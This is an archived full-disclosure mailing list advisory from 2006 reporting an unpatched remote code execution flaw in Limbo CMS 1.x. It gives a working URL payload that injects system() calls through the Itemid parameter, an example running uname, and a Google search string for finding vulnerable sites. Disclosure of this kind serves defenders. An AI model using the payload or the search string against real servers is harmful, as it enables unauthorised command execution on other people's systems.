'[Full-disclosure] Limbo CMS code execution'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Limbo CMS code execution
From:       "Alexander Hristov" <joffer () gmail ! com>
Date:       2006-02-28 23:34:09
Message-ID: 734063a30602281534gadc67abj6d1fa4a163a43ae1 () mail ! gmail ! com
[Download RAW message or body]

Official page : http://www.limbo-cms.com/

Vulnerable : Limbo 1.*

Fix : No

Bug : http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(CODE)

example : index.php?option=frontpage&Itemid=system(uname)

Google search string : inurl:"option=frontpage"

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic